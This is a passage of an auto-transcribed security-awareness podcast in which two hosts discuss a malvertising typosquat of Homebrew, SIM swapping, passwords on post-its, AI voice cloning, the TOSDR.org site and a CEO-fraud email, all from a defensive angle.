Do not share your primary email publicly. That's kind of hard to do in this day and age with data breaches every week. Yeah. So yeah, look, you might want to have a play with that. We'll put a link in the newsletter. But as an awareness professional, it could be good for inspiration.
Luke (35:14.86)
Yeah.
Luke (35:30.476)
menace and but i isn't topics of secure and his techniques
Anthony Davis (35:34.162)
Yeah, kind of looks like just with a tad bit more polish. It could be, could be awesome.
Luke (35:40.558)
Yeah
Anthony Davis (35:43.507)
Next one I want to talk to, I know I said I wasn't going to do a lot of screen shares, I'm really sorry Luke, I it makes editing a right nightmare. But I'm just going to share this one. This was from Harley Sugarman, who is founder and CEO at Anagram Security. And actually I've had a conversation with Harley, won't be out for a few weeks because there's a bit of a queue, but had a really good conversation for the interview series with Harley.
So that'll be out in a few weeks. I saw this on LinkedIn. Harley came across this pretty clever attack last week through Google Ads targeting dev teams via Homebrew. Sound familiar? The attackers show a legitimate brew.sh URL in the ads, but then quietly redirect to brew with an E, B-R-E-W-E.sh post click. So Google Ads are showing the real
BREW.SH URL. a silent redirect to BREWE.SH. It deploys a stealer and it's running about $1,000 a month on dark markets. this essentially, Harley says, this is exactly why security awareness needs to evolve beyond check the URL because modern attacks are exploiting the very platforms and verification systems we're to trust.
While Cuckoo claims to have addressed this specific incident, please be cautious. Simple but effective defense, direct bookmarks for critical dev tools. Don't trust Google Ads. You can't trust Google Ads. Stay away from Google Ads. I think that's what it boils down to, doesn't it?
Luke (37:22.158)
Mm.
there. It's always seen it plenty of times at the sponsored ads. Always find the actual website or find it somewhere else.
Anthony Davis (37:30.694)
Yeah. Yeah. I.
I mention those domains because those domains are dead now, like the malicious domain is gone. we had that December. It doesn't seem like it was that long ago. It was really early doors. Luke, you found one, didn't you? Searching for... Google ads.
Luke (37:53.054)
Google Ads. Yeah, and it obviously showed the real Google Ads domain before I clicked on it and then clicking on it was a Google site that looked like the Google Ads website. was quite an impressive one.
Anthony Davis (38:07.366)
Yeah, and the whole reason that was allowed I can't check it with this one because the website's gone But the whole reason this was allowed was because it was a Google site So it sat within Google comm which meant it was like trusted
Luke (38:16.76)
Yeah.
Luke (38:20.834)
That's crazy. Yeah, very clever.
Anthony Davis (38:22.138)
It's clever, but it's crazy. Yeah. Yeah.
Right, the next thing I wanted to mention, and this is kind of, I was debating whether or not to mention this or not because it's a little bit morbid, but it's, the,
Anthony Davis (38:42.234)
There was video released this week of... it was footage of the wife of the Ocean Gate CEO. So you know the Titan submarine that imploded. Do remember that from... was that last year? Where the custom-built submarine deep deep down imploded like really really quickly. There was a search for them and then they found the wreckage. So I saw this on Interesting as F.
on Reddit and it's footage of the implosion happening. So they're on board on the ship and they basically take it, there's a bang and they go, what was that bang? And then a command comes through from the submarine. So obviously the sound of the bang traveled faster than the command did. So they've now said that this was the sound generated from the submarine imploding.
Luke (39:34.51)
you
Anthony Davis (39:40.282)
Why am I telling you this? is why am I talking about submarines and imploding and all of that?
Luke (39:44.009)
I was a bit confused if I had spied low sneak peek at the link
Anthony Davis (39:48.043)
have you? Okay. So I'll just zoom this in. I looked at the comments, the comments themselves straight away didn't give anything. Can I watch the video? But you can see here, if you're watching this on YouTube, you can see here in the right, bottom left hand corner of the video, you can make out, there's a little posting note on the desk. And someone has,
Luke (40:11.85)
you
Anthony Davis (40:17.188)
zoomed in and maybe done a little bit of clarity on it and it does say laptop password ocean gate so the password for the laptop is on a post-it note and ultimately i mean i don't think they intended for that video to be shared on the internet but yeah passwords on post-its
Luke (40:36.686)
Mm.
Now see that, obviously talk about it a lot as awareness professional but you see it all the time, TV shows and movies, they'd like to do that a lot when people are breaking into houses and finding posts and those with passwords on them, logging in through them. But obviously it happens and it reminds me of the...
Anthony Davis (40:58.448)
Yeah.
Luke (41:03.084)
Was it the passcode or was it Kanye West? Was it Kanye West or was it Donald Trump? can't remember. Probably both of them. Yeah. Zero zero zero zero. No, it's like... this story it's not even a hard pass to remember. I'll write it down. It's crazy.
Anthony Davis (41:07.888)
It was Kanye West in Donald Trump's office. Like six zeros.
Anthony Davis (41:20.932)
No. Like just tell people it's Ocean Gate. Like you don't need to put it on a post-it note, surely.
The last one I wanted to tell you about actually happened so this came from Oli, Oli Inkle and he sent this to me. A friend of his got a text message from EE, the mobile network, their mobile network. So EE is a mobile provider here in the UK. And it said, hi from EE, please be alert to fraud. As requested.
Luke (41:48.067)
Mm.
Anthony Davis (41:58.269)
We've ordered a replacement eSIM for you which will stop your current SIM from working. If you weren't expecting this, call us straight away at 150, thanks. And this same person received multiple phone calls from an unknown number around the same time. So they contacted EE and they'd been SIM swapped. So it succeeded, socially engineered help desk.
Luke (42:15.608)
Hmm.
Anthony Davis (42:27.794)
and a SIM swap had taken place. And SIM swaps, you know, that means that any text message, any SMS authentication codes come through to your new SIM, because your number is now on a new SIM in someone else's phone. So this is textbook. This is like what people think is happening at &S and you know, all the others, like it's SMS. If your SMS now goes to someone else, they try and log into your account.
Luke (42:44.579)
Yeah.
Anthony Davis (42:57.562)
authenticated sends an SMS message, it goes to their phone, not yours. Which is why.
Luke (43:01.634)
Yeah, it's not even just account credentials, lot of apps and banking does that as well. So yeah, people could just log into your bank account and take all money. I saw something the other week about some providers you can lock your SIM or prevent the porting of it.
the Google and they call it a port freeze. I can't, I don't know if it's available to everybody and how straightforward it is to get done but there might be something to look into about looking into getting your number protected.
Anthony Davis (43:31.986)
Anthony Davis (43:45.468)
So I've just googled this and EE themselves. What do they say? So this is a...
Anthony Davis (44:01.354)
So someone says, it appears as if the security threat of SIM jacking is increasing and one of the recommended ways of protecting against it is to lock your phone number with your service provider. Many network service providers offer port freeze on number lock to protect your mobile number from unauthorized transfer. Once activated, you can't port your number to another line or carrier unless you remove the lock either with a pin or by walking into the store. If your carrier allows this feature,
It's an excellent way to beef up your SIM protection. Does EE offer this service? Says someone on EE's community. And EE community support team come back and say, this is not an option. To be able to port a number to another network, the account holder must pass all of our security measures that are put in place to protect their number. But clearly those security measures aren't working very well. So please don't cut me off EE, as I am an EE customer.
Luke (44:44.717)
Mm-hmm.
Luke (44:56.462)
Yeah, they're probably very basic. It's probably like your address and your secret answers that are probably not very tricky to answer.
Anthony Davis (45:05.852)
But this is it, right? So if your password gets compromised, password reuse, for example, could be a thing. So first and third characters from your password or something like that. Your address, the date of your bill, all kinds of things. A lot of this data is out there now. It's not difficult to find out someone's address nowadays.
Luke (45:32.714)
No. I'm surprised it's not a standard thing for porting SIM cards having the ability to disable that without physically going to a store to get it done or...
Anthony Davis (45:42.449)
Mm-hmm.
Anthony Davis (45:46.747)
I don't, even if it was a calling off period, like, and I guess there's reasons for it, but if I wanted to port my number from one to another, then going to a store wouldn't be much of an inconvenience, but I get how it would for other people. But maybe it could be like, porting a number takes a week, and we'll notify you three times during that, and make it very clear in the messaging what this actually means.
Luke (46:01.816)
Hmm.
Luke (46:10.381)
Yeah.
Anthony Davis (46:14.322)
Because that message that Oli's friend had received, we've ordered a replacement eSIM for you, which will stop your current SIM from working if you weren't expecting this. What that doesn't say is you have requested to transfer your number from your SIM card to another SIM card. Clear. So EE's messaging is really poor on that and that's where it should be improved. That message should say you have requested to transfer your number.
Luke (46:31.968)
Mm, yeah, not very clear.
Anthony Davis (46:43.506)
from your SIM card to another SIM card. If you have not made this request, contact this number. Don't talk about eSIMs and current SIMs, because some people won't know what that means.
Luke (46:46.382)
Mm-hmm.
Luke (46:50.114)
Yeah. No. You'd have thought it'd be possible to just be like, you need to verify this on your current number. Or even like an app. Some providers might have an app and you could enter your code or biometrics to authorize that transfer. These days you think that'd be a thing.
Anthony Davis (47:07.612)
Yeah.
Anthony Davis (47:16.562)
Do know, when you get, and maybe it needs to get to this level, when you, um, when you sign, like when you get a new driver's license, where you get a passport, you have to like scan your identity in an app. There's one, there's one I've seen recently called Auth ID and you have to actually like take a picture of your documents. can't provide an up a previous picture. You have to do it within the app. Maybe they need to do that because like mobile phones are a big deal. They're a gateway to a lot of things. Like we've said.
phone number can get you into a bank account, medical record, all kinds of things. So maybe they just need to up their game with what that security is and actually start make sure it isn't just like name of first school, name of know first pet, third and fourth character of your password.
Luke (47:52.259)
Mm.
Luke (47:58.37)
new.
Anthony Davis (48:11.634)
I had one last thing I want to talk to you about this week and this was an article I saw on Fast Company and this is titled Gen Z is willing to sell their personal data for just $50 a month. So apparently there's a new app called verb.ai and what they want to do
So this article says, to take advantage of the nearly seven hours a day Gen Z spends on their phones, a new app called verb.ai, launched by youth polling company Generation Lab, is now offering to pay young people for their scrolling type. So you install a tracker that monitors what you browse, what you buy and what you stream. And then verb creates a digital tweet. This sounds awful.
VIRB creates a digital twin of each user that lives in a central database. And from there, companies and businesses can query the data in a chat GPT-like interface and get a more accurate picture of consumer preferences than you would get even from a room of Gen Zers.
It just sounds dreadful.
Luke (49:25.55)
Sounds like a Black Mirror episode.
Anthony Davis (49:27.858)
Yeah, in return for their personal data, Verbe pays $50 or more per month to the user depending on the activity. So for Gen Zers, it's a fair enough deal for something that they're likely doing anyway. And 88%, apparently 88 % of Gen Zers, oh, Gen Zers, I hate that phrase. 88 % of Gen Zers, Zeders, Gen Zeders?
88 % of Gen Zers report being willing to share some personal data with a social media company, compared to just 67 % of older ad-lis provided that is that they're fairly compensated either with cash or a personalised algorithm.
Anthony Davis (50:16.038)
Yeah, it says here though, it's a generation filled with contradictions. Gen Z is at the same time still taking protective measures. They are clearing cookies using anonymous browsers and encrypting their communications twice as often as other generations. However, they're more likely to agree with the statement I don't mind being tracked by websites or apps. Look, I think there's a massive task here and everyone in cyber security.
Luke (50:39.982)
Thank
Anthony Davis (50:44.602)
or in cyber security messaging or awareness. If you've got Gen Z young people, people under the age of 35, 30, whatever it is, you need to make them realise what they're giving up because it's really easy now and I've said it on this episode, like everybody's getting preached, know, like you can't keep this data safe anymore, but you still need to care, don't you? Or at least be aware. You can't just blindly trust that everything's gonna be okay.
Luke (51:08.599)
Yeah.
Anthony Davis (51:14.544)
Maybe it is, I think we've said before, maybe this generation we're talking about aren't the generation typically with mortgages or mouths to feed or stuff like that. And that's more and more increasing, but they need to care because one day they will. And if all their data's out there, they're screwed.
Luke (51:14.86)
Nice.
Luke (51:32.418)
Yeah, it's definitely something to think about and it's probably going to get worse with the future generations. How everything's digital these days and apps like TikTok and all the social media.
Anthony Davis (51:38.929)
Yeah.
Anthony Davis (51:47.911)
Yeah, yeah, there's not been a few weeks ago. We spoke about tick tock getting banned I got us that's probably coming again soon. Isn't it? That was a Had like a 60 day reprieve or something that will be that's probably due it in the next couple of weeks We'll probably be talking about Yeah It's my story's done sir, so it's over to you
Luke (51:58.432)
Yeah, probably.
Luke (52:05.454)
Probably,
Luke (52:13.038)
Cool yeah, this is something I saw on TikTok. Basically, yeah if you could pop it up on the screen it great. Yeah can let it play but it was about an AI voice controversy with ScotRail in the UK. And yeah, voiceover artist Gaian Potter has been AI cloned.
Anthony Davis (52:18.62)
to share it.
Luke (52:43.214)
hopefully we'll play the video to just to run that yeah
Anthony Davis (52:45.148)
Here we go.
Anthony Davis (54:12.242)
That's interesting isn't it? This is exactly why there was a big Axis and Riot strike in America last year.
Luke (54:13.688)
Yeah.
Luke (54:19.794)
Yeah, and I thought it was quite a shocking story, I guess, especially, yeah, with how we sort of discussed AI and voice, we've spoken about voices before and people getting it stolen without permission. But in this case, that 2021 contract has come to bite them in the back with probably a clause somewhere that said it was...
going to be used or stored for future use and maybe they didn't read it properly or...
Anthony Davis (54:50.086)
your voice may be used to train AI models or something like that in a small print.
Luke (54:53.1)
yeah and it's here we go two years later and the voice is there on scott rail
Anthony Davis (55:00.25)
It does make you wonder where it ends. We're talking about her voice, right? Which might not be, like some people might say, it's just a voice. You could hear it walking down the street. she's had no, as a creative, you probably get to choose who you do business with. So yes, it's just Scott Raill on this occasion, but that could be someone political or someone, the message could be offensive or.
Luke (55:16.11)
Hmm.
Anthony Davis (55:28.562)
it could be of one particular opinion that, you know, she doesn't agree with that a client that she'd never choose to do business with for moral grounds. Yeah, but where does the line stop as well? It's just a voice. Okay, but a voice is okay, but a face isn't. So we see all the stuff about, you know, deep fakes being banned and, you know, deep fakes being used for like revenge stuff and you know.
Luke (55:33.827)
Yeah.
Luke (55:37.742)
That could be really damaging.
Luke (55:51.758)
Hmm.
Luke (55:55.532)
You see it on social media as well now. People, influencers getting deep faked for ads and... that we saw. Yeah.
Anthony Davis (56:01.319)
We had one last week and the week before so it's... yeah.
Luke (56:05.708)
Yeah, the build thing is around the Delores and the League Alley's that aren't really in place because it's still quite new and not really been... That was really set up, determined it.
Anthony Davis (56:17.584)
No, need some, there hasn't been test cases on all of this yet. That's probably the problem, it's, this is, in a way this reminds me, and I don't know where this comes from, but Delar Sol's album, Three Feet High and Rising, wasn't released on digital, it wasn't released on streaming for years, right? Because the contracts at the time didn't even consider that streaming would be a thing. So all of the,
Luke (56:25.294)
Yeah.
Luke (56:44.846)
Mm.
Anthony Davis (56:46.394)
rights they had for the samples didn't allow for streaming, they allowed for like seeded physical media, but they didn't allow for streaming. So it wasn't released for years and it took them ages to get those permissions to release those just last year on Spotify and Apple Music and stuff. And this is like the opposite of that. It's like, they've probably been so vague in the teasers, I'm assuming here, if you work for whoever that company was that say they were like legal within use, I'm assuming, right? But.
Luke (56:59.822)
Hmm.
Luke (57:11.854)
Mm-hmm.
Anthony Davis (57:14.65)
I would imagine that in some cases, T's and C's are vague enough that they can't be defended. They're like quite wide open. And who reads the T's and C's? This is a problem.
Luke (57:20.493)
Hmm.
Yeah, it reminded me of our YouTube video, the Halloween one we did like this. Yeah, just about not reading T's C's particularly well and it happens a lot where people are, in our sort of world, are downloading and signing up to all sorts of apps and data is going left right centre. Yeah.
Anthony Davis (57:29.702)
That's exactly it.
Anthony Davis (57:40.915)
look we knew it was going to happen we told we predicted the future this is exactly it yeah if you're unfamiliar with the video the video is available on our YouTube I'll put a link to it in here it's called likeness and we did it for Halloween last year and I sit down at a computer thinking it's going to create a clone of me it scans my likeness I don't go ahead because it asks me for money
Luke (57:46.99)
Yeah.
Anthony Davis (58:07.302)
And then there's a number of scenarios where my likeness is used without my permission. And like even like, all because I didn't read the T's and C's.
Luke (58:12.909)
because you didn't read the T's and C's.
Anthony Davis (58:19.548)
Yeah, amazing.
Anthony Davis (58:25.436)
Can, just one thing to add on that, and I haven't thought of this before, but maybe chat GPT solves the T's and C's problem, right? Maybe you copy and paste the T's and C's into chat GPT, or an AI of your choice, and you say, what red flags are in this T's and C's? What do I need to be aware of? What am I giving away? Maybe you can ask questions like that, and it will tell you, it will read it for you.
Luke (58:48.462)
you
Anthony Davis (58:55.046)
That's a really great use of AI. Like what red flags are in these Ts and Cs? What should I really be aware of? Ask it a question like that. I've never thought of that before, but that might be something. I might have a play with that and bring something next week. You'll never guess what they say in their Ts and Cs.
Luke (59:04.174)
Yeah.
Luke (59:08.514)
Well, for... Yeah.
I mean for personal use for sure and then I'm sure for business use there's obviously legal teams that will read it or paste it into chat.gp or whatever AI tool and do it for you but yeah there's a website as well wasn't there that does a tntsense thing
Anthony Davis (59:31.527)
I was just gonna say, we spoke about this before and I couldn't remember what it was called and I couldn't find it. And literally as we were talking about this, it's come to me. So there is a website called TOSDR.org, TOSDR.org, terms of service didn't read. And you can search for a number of services on here. This website's been around for years. And essentially it tells you,
So Facebook, for example, it gives it a grade. Facebook, it gives a grade E. Facebook stores your data, whether you have an account or not. The service can read your private messages. The service can view your browser history. And deleted content is not really deleted. And the service keeps user logs for an unidentified period of time. And you can go into more detail of that. And it literally lists like reds, ambers, greens. So.
TOSDR.org site of the week. You can get security grades of lots of top services. Interestingly, DuckDuckGo, which is the cyber security professional's browser of choice, gets a grade C.
So, yeah.
Luke (01:00:50.506)
really handy website.
Anthony Davis (01:00:52.048)
Yeah, yeah, so check that out to TOSDR.org
Right, last one from you.
Luke (01:01:00.322)
Yeah, just a quick one to share about. I use WhatsApp and received a message from the official WhatsApp account this week telling me to increase my account security with Paskey. So I it was quite a sort of cool thing and we've spoken about before with TikTok ran a 2FA campaign on their official account and stuff like that. But yeah.
This is interesting thing that they're sort pushing pass keys now on it. It just explains, maybe not in the best way, it doesn't really. It says about help protect your account, pass keys, add an extra layer of security by using your face, fingerprint or screen lock to log in, head to settings, tap account and then pass keys. And then it gets the side button, which I mean I use WhatsApp for web as well and it doesn't go anywhere for a web, tells it to go on my phone, which is probably not the best user experience to be honest. It probably could have told me some information.
Anthony Davis (01:01:56.412)
Yeah, I just found that out as well.
Luke (01:01:57.74)
But yeah, I did it on my phone. I use Android and it was pretty quick process. It's a kickstart button. I just clicked that and it basically was like two steps and saved it to my account. And now I use a passkey for WhatsApp. So yeah, no, it's just a cool little feature that they've dropped in there. And you can tell it's from WhatsApp because it's a verified account.
It's like a specific pop-up I guess only for them that says it's official.
Anthony Davis (01:02:29.746)
Can we still trust the blue checkmarks in WhatsApp? I think we can, can't we? There's only Twitter, where you can buy them now.
Luke (01:02:36.31)
Yeah. Yeah.
Anthony Davis (01:02:40.622)
Yeah, it says, I see your screenshot, says, this is an official account of WhatsApp. Learn to click, click to learn more. So, yeah.
Luke (01:02:48.992)
Yeah, that was good to see it on there.
Anthony Davis (01:02:53.68)
Yes, absolutely. There was one last thing, I've just seen your note on this. am just as a funny little closer. I got an email that was apparently from Luke, but it wasn't from Luke. I found it in my junk mail. And yeah, let me see if I can, I don't think I can find it, which is a shame.
Luke (01:02:56.758)
and
Luke (01:03:04.524)
Yeah.
Anthony Davis (01:03:23.602)
But yeah, it was It came from Luke it came from me What am I saying? Hang on? I'll find it here. Here it is
Luke (01:03:36.76)
Whereas someone imitating me with a hotmail or Gmail account, I think, wasn't it?
Anthony Davis (01:03:41.488)
Yeah, here it is.
Anthony Davis (01:03:46.215)
And when I look at it now, it's really obvious that it's not from you. And it's a good job it went in my spam mail. But this is, you ask how, you have to ask how do, like, how do they find this stuff out, right? So it's, the knowledge and the fact that we're connected is clearly out there. So this went to my risky creative email address, which is only six or seven months old. And it's secure, two-factor authentication. You know, it's...
pretty much as secure as a Google email account can be. And you can see here, hello Ant, how are you doing? Well I'm tied up in a conference meeting. I need you to answer a short but urgent task for me. Kindly reply with your personal WhatsApp number and look forward to my text. Kind regards, Luke Pettigrew. And obviously it's not from Luke's email account, it's from a Gmail account, random Gmail account.
Luke (01:04:43.128)
Yeah.
Anthony Davis (01:04:44.496)
So yeah, that fell in my spam. So it was in my spam folder, but it's nice big banner. Well done Google for flashing that big red banner. This message seems dangerous. Similar messages were used to steal people's personal information. The lovely thing about that is Google's obviously read the content and knows that that kind of message is malicious. I'm not sure all mail providers would do that, but Google wins on that one. But yeah.
Luke (01:04:48.942)
You've got a nice big band in there as well.
Anthony Davis (01:05:13.23)
someone's obviously gone out there. mean it's not hard to find that we're connected. Our names are on the website and stuff like that. We're in the public eye now, Luke. We've put ourselves out there.
Luke (01:05:21.934)
Yeah, thinking about it now, you should have replied to it. Let's see what happens.
Anthony Davis (01:05:28.892)
There's been zero effort to try and make it sound like it's very, very formal, isn't it? I need you to answer a short but urgent time.
Luke (01:05:34.284)
This is probably a template that.
Yeah, it's probably a in a bot that just sends it out to everybody. That's funny.
Anthony Davis (01:05:43.922)
Yeah. Yeah.
Anthony Davis (01:05:48.22)
So yes, obviously Luke didn't have an urgent task, because I text him and said, look at this email I just got from you, because I already had his number and he already had my number, so he doesn't need me to email my personal WhatsApp.
Luke (01:05:55.15)
Yeah, that's way to do it.
Luke (01:06:01.55)
You
Anthony Davis (01:06:05.498)
Yes, right. Is that it for this week? I think that's it for this week, isn't it? Excellent, right. So, if you're going to Infosic Europe, come and say hi, I'll see you there. Cyber 100 Club, Wednesday. Find out if we've won anything, half past five, Cyber 100 Club. Tell your people not to, I think the takeaway this week is tell your people not to paste stuff into a run box on Windows.
Luke (01:06:09.102)
think it is.
Anthony Davis (01:06:34.618)
Window asks you to press Windows key R. There's your messaging for this week. Never press Windows key R when instructed by a webpage. Yeah. So, Thursday. Go and watch Crack It Interview with Sarah Carty. Join us next week, Monday, to find out who's been breached this week. Because no doubt there'll be a couple more by the next time we talk to you. Luke, see you next week.
Luke (01:06:42.36)
Yeah.
Luke (01:06:57.582)
Yeah.
yeah, thanks. See you all next week. Bye.
Anthony Davis (01:07:04.275)
See ya,